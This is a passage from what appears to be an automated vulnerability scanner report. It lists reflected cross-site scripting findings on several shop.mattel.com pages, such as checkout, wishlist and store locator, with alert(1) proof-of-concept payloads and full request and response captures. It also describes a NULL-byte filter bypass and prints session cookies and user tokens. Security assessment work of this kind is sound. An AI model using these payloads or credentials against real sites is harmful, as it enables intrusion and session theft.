GET /brand/index.jsp?95e25"-alert(1)-"dca41e50f50=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:11:56 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 36543
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.60. https://shop.mattel.com/brand/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.mattel.com
Path:
/brand/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload fb987--><script>alert(1)</script>1b3aab43a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /brand/index.jsp?fb987--><script>alert(1)</script>1b3aab43a=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:11:58 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 36581
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o ...[SNIP]... <!-- === Request Query String: fb987--><script>alert(1)</script>1b3aab43a=1 --> ...[SNIP]...
1.61. https://shop.mattel.com/checkout/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.mattel.com
Path:
/checkout/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 593fd"-alert(1)-"60a7e7979cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:11:43 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache Pragma: no-cache P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 43976
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--Preview TimeZone = 'null' --><!--Preview Time ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.62. https://shop.mattel.com/checkout/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.mattel.com
Path:
/checkout/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload d4795--><script>alert(1)</script>7a3578d3d18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:11:44 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache Pragma: no-cache P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 43228
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.63. https://shop.mattel.com/emailSignup/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.mattel.com
Path:
/emailSignup/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8323d--><script>alert(1)</script>25b88f59a0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /emailSignup/index.jsp?8323d--><script>alert(1)</script>25b88f59a0c=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:11:58 GMT Server: Apache/2.0.63 (Unix) Cache-Control: P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 51377
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/ ...[SNIP]... <!-- === Request Query String: 8323d--><script>alert(1)</script>25b88f59a0c=1 --> ...[SNIP]...
1.64. https://shop.mattel.com/emailSignup/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.mattel.com
Path:
/emailSignup/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77927"-alert(1)-"63de54cd57b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /emailSignup/index.jsp?77927"-alert(1)-"63de54cd57b=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:11:56 GMT Server: Apache/2.0.63 (Unix) Cache-Control: P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 51329
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/ ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.65. https://shop.mattel.com/giftCertificates/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.mattel.com
Path:
/giftCertificates/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 7155e--><script>alert(1)</script>64bb62cd0af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /giftCertificates/index.jsp?7155e--><script>alert(1)</script>64bb62cd0af=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:12:03 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 43920
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.66. https://shop.mattel.com/giftCertificates/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.mattel.com
Path:
/giftCertificates/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e95e4"-alert(1)-"ba8774a4224 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /giftCertificates/index.jsp?e95e4"-alert(1)-"ba8774a4224=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:11:56 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 43932
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.67. https://shop.mattel.com/product/wishlist/wishlist.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.mattel.com
Path:
/product/wishlist/wishlist.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a7af6--><script>alert(1)</script>e0edaf36a48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /product/wishlist/wishlist.jsp?a7af6--><script>alert(1)</script>e0edaf36a48=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:11:59 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:06 GMT; path=/ Content-Language: en X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 36782
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http:/ ...[SNIP]... <!-- === Request Query String: a7af6--><script>alert(1)</script>e0edaf36a48=1 --> ...[SNIP]...
1.68. https://shop.mattel.com/product/wishlist/wishlist.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.mattel.com
Path:
/product/wishlist/wishlist.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %008cdef"-alert(1)-"d3ac09be35f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8cdef"-alert(1)-"d3ac09be35f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /product/wishlist/wishlist.jsp?%008cdef"-alert(1)-"d3ac09be35f=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:11:58 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:05 GMT; path=/ Content-Language: en X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 36756
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http:/ ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.69. https://shop.mattel.com/storeLocator/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.mattel.com
Path:
/storeLocator/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79e26"-alert(1)-"8e17875d268 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /storeLocator/index.jsp?79e26"-alert(1)-"8e17875d268=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:11:56 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 40857
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.70. https://shop.mattel.com/storeLocator/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.mattel.com
Path:
/storeLocator/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 163a7--><script>alert(1)</script>cd69434ff01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /storeLocator/index.jsp?163a7--><script>alert(1)</script>cd69434ff01=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:11:57 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 40821
